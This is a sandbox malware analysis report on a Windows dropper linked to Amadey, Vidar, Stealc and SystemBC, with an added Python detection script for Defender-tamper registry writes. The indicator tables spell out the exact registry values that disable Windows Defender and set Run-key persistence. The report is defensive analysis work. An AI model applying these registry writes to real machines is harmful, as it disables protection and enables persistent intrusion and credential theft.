Analysis Overview
SHA256
a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972
Threat Level: Known bad
The file a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972 was found to be: Known bad.
Malicious Activity Summary
GCleaner
Detect Vidar Stealer
Vidar
Vidar family
Healer
Modifies Windows Defender Real-time Protection settings
Detects Healer an antivirus disabler dropper
Healer family
Litehttp family
LiteHTTP
Modifies Windows Defender DisableAntiSpyware settings
Modifies Windows Defender TamperProtection settings
SystemBC
Amadey family
Stealc family
Stealc
Modifies Windows Defender notification settings
Systembc family
Gcleaner family
Amadey
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Blocklisted process makes network request
Checks computer location settings
Windows security modification
Loads dropped DLL
Executes dropped EXE
.NET Reactor protector
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Identifies Wine through registry keys
Checks BIOS information in registry
Adds Run key to start application
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Browser Information Discovery
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Modifies system certificate store
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-06 02:01
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-06 02:01
Reported
2025-03-06 02:04
Platform
win7-20240729-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
Stealc
Stealc family
SystemBC
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\rbkvgg\bdhx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\rbkvgg\bdhx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\rbkvgg\bdhx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\ProgramData\rbkvgg\bdhx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
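The Defender rows above (the DisableAntiSpyware, Real-Time Protection, TamperProtection and notification writes, all by ac8277ecde.exe) are ATT&CK T1562.001, Impair Defenses: Disable or Modify Tools. The script below is an added example, not part of the report: it re-parses those indicator rows, normalises the kernel-style key paths, and fires only on the disabling value, so a policy set back to 0 or an unrelated Run key does not match (the two control rows at the end of the event list are constructed, not from the report). One detail the rule keeps: the TamperProtection write sits under Wow6432Node while the Policies writes do not. HKLM\SOFTWARE\Policies is exempt from WOW64 registry redirection, HKLM\SOFTWARE\Microsoft\Windows Defender is not, so a 32-bit dropper opening the Features key without KEY_WOW64_64KEY lands in the 32-bit view that a 64-bit Defender service never reads, and Tamper Protection does not exist at all on the Windows 7 image this detonation ran on. The write documents intent rather than effect, and the example tags it as redirected instead of counting it as a successful disable. That reading of the redirection is this example's interpretation, not a finding the report states.

```python
"""Defender-tamper rule evaluation over sandbox registry-write rows.

Added example, not part of the report. The event rows are copied from the
report's indicator tables (plus two constructed control rows at the end);
the rule table and the WOW64-redirection interpretation are this example's own.
"""
import re
from dataclasses import dataclass

PROC = r"C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe"

# (Description, Indicator, Process) in the form the report prints them
EVENTS = [
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"', PROC),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"', PROC),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"', PROC),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"', PROC),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"', PROC),
    ("Key created",     r'\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection', PROC),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"', PROC),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"', PROC),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"', PROC),
    # constructed control rows: a setting switched back on, and an unrelated autorun value
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "0"', r"C:\Windows\System32\gpupdate.exe"),
    ("Set value (str)", r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater = "C:\\tools\\u.exe"', r"C:\tools\setup.exe"),
]

# Keys whose value disables a Defender component (ATT&CK T1562.001), matched
# after normalize(); the second field is the value that means "off".
RULES = [
    (r"^HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware$", "1",
     "antivirus engine disabled by DisableAntiSpyware policy"),
    (r"^HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\Disable\w+$", "1",
     "real-time protection component disabled by policy"),
    (r"^HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\\TamperProtection$", "0",
     "Tamper Protection switched off"),
    (r"^HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\Notifications\\DisableNotifications$", "1",
     "Security Center notifications suppressed"),
]

# indicator column: "<key path>" or '<key path> = "<value>"'
IND_RE = re.compile(r'^(?P<path>[^=]+?)(?:\s*=\s*"(?P<value>[^"]*)")?$')


@dataclass
class Finding:
    process: str
    key: str
    value: str
    label: str
    redirected: bool  # written under Wow6432Node, i.e. into the 32-bit registry view


def normalize(path):
    """Turn the kernel-style \\REGISTRY\\MACHINE path into HKLM form and strip
    the Wow6432Node component, reporting whether the write was redirected."""
    key = re.sub(r"^\\REGISTRY\\MACHINE\\", r"HKLM\\", path, flags=re.I)
    key = re.sub(r"^\\REGISTRY\\USER\\", r"HKU\\", key, flags=re.I)
    redirected = re.search(r"\\Wow6432Node\\", key, re.I) is not None
    key = re.sub(r"\\Wow6432Node\\", r"\\", key, flags=re.I)
    return key, redirected


def evaluate(events):
    """One Finding per registry write that matches a rule with the disabling
    value; 'Key created' rows and re-enabling writes are ignored."""
    findings = []
    for desc, indicator, process in events:
        m = IND_RE.match(indicator)
        if not desc.startswith("Set value") or not m or m.group("value") is None:
            continue
        key, redirected = normalize(m.group("path"))
        for pattern, off_value, label in RULES:
            if m.group("value") == off_value and re.match(pattern, key, re.I):
                findings.append(Finding(process, key, off_value, label, redirected))
    return findings


def summarize(findings):
    """Distinct tamper labels per process, for a one-line verdict."""
    out = {}
    for f in findings:
        out.setdefault(f.process, set()).add(f.label)
    return {p: sorted(labels) for p, labels in out.items()}


if __name__ == "__main__":
    for f in evaluate(EVENTS):
        tag = "  [Wow6432Node: 32-bit view, not read by 64-bit Defender]" if f.redirected else ""
        print(f"{f.label:<55} {f.key}{tag}")
    print(summarize(evaluate(EVENTS)))
```

Feeding the report's nine Defender rows through `evaluate` yields eight findings for ac8277ecde.exe (the bare `Key created` row carries no setting), exactly one of them flagged as redirected; the two constructed control rows produce nothing.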
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\765aeb8838.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109140101\\765aeb8838.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\151fdd87ae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109150101\\151fdd87ae.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\ac8277ecde.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109160101\\ac8277ecde.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\b7ef68053e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\b7ef68053e.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\dc32b0ba15.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109130101\\dc32b0ba15.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2112 set thread context of 3008 | N/A | C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe | C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe |
| PID 2796 set thread context of 2088 | N/A | C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2280 set thread context of 2800 | N/A | C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 3512 set thread context of 3992 | N/A | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\rbkvgg\bdhx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
